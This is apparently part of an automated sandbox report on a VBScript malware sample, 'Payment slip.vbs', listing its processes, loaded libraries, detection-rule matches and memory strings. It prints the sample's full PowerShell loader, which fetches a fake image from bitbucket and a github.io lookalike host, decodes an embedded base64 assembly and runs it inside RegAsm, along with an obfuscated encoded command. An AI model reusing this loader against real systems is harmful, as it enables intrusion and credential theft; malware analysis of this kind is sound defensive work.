                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05AA8BD16_2_05AA8BD1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05D947B86_2_05D947B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05D981D06_2_05D981D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05D9A0B06_2_05D9A0B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05D953D06_2_05D953D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05D91FC06_2_05D91FC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05D981C06_2_05D981C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05D921186_2_05D92118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05D920BC6_2_05D920BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05D9A0A06_2_05D9A0A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05D960486_2_05D96048
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05D923246_2_05D92324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05D9220C6_2_05D9220C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05D94B006_2_05D94B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05D912D86_2_05D912D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05D912E86_2_05D912E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05D9BCF86_2_05D9BCF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05D9BCE76_2_05D9BCE7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05D91FB16_2_05D91FB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0627BEB86_2_0627BEB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0627D2886_2_0627D288
                Source: Payment slip.vbsInitial sample: Strings found which are bigger than 50
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5276
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5276Jump to behavior
                Source: Process Memory Space: powershell.exe PID: 976, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6164, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: 4.2.powershell.exe.1be201a0000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'CreateDecryptor'
                Source: 4.2.powershell.exe.1be201a0000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                Source: 4.2.powershell.exe.1be201a0000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                Source: 6.2.RegAsm.exe.43a5590.1.raw.unpack, QI6Jy4WEhefhjRy8hP9.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.2.RegAsm.exe.43a5590.1.raw.unpack, QI6Jy4WEhefhjRy8hP9.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.2.RegAsm.exe.43a5590.1.raw.unpack, QI6Jy4WEhefhjRy8hP9.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.2.RegAsm.exe.43a5590.1.raw.unpack, QI6Jy4WEhefhjRy8hP9.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.2.RegAsm.exe.5880000.2.raw.unpack, w0gUvjn1pmlF6l1K21B.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.2.RegAsm.exe.5880000.2.raw.unpack, w0gUvjn1pmlF6l1K21B.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.2.RegAsm.exe.5880000.2.raw.unpack, w0gUvjn1pmlF6l1K21B.csCryptographic APIs: 'CreateDecryptor'
                Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winVBS@8/8@4/4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.logJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\fdcfab3c666edcce
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kspgfqmt.j3b.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment slip.vbs"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegAsm.exe, 00000006.00000002.1619760521.00000000035DD000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1619760521.00000000035EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Payment slip.vbsVirustotal: Detection: 16%
                Source: Payment slip.vbsReversingLabs: Detection: 13%
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment slip.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@C
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.dfgdmAI/niam/sdaeh/sfer/k63/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.dfgdmAI/niam/sdaeh/sfer/k63/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
